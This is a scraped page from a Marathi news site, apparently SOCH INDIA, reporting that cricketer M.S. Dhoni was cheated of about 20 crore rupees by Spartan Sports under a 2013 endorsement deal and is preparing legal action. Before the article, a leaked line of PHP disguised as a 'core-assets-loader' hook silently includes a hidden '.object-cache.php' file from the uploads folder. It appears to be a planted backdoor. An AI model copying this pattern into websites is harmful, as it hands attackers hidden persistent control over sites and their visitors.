add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); धोनीची 20 कोटी रुपयांची फसवणूक – SOCH INDIA
Menu

खेल
धोनीची 20 कोटी रुपयांची फसवणूक

nobanner

भारताच्या वनडे आणि टी 20 टीमचा कॅप्टन महेंद्रसिंग धोनीची तब्बल 20 कोटी रुपयांची फसवणूक झाली आहे. धोनीनं स्पार्टन स्पोर्ट्स या कंपनीबरोबर करार केला होता. धोनीच्या बॅटवर याच कंपनीचा लोगो आहे.

एकूण 13 कोटी रुपयांचा हा करार होता. रॉयल्टीची रक्कम पकडून हीच रक्कम 20 कोटी रुपयांपर्यंत जाते. या कंपनीनं मात्र धोनीला नियमितपणे रक्कम दिलेली नाही. 2013 मध्ये धोनीनं या कंपनीबरोबर करार केला होता. आता धोनी या कंपनीविरोधात कायदेशीर कारवाई करायच्या तयारीमध्ये आहे.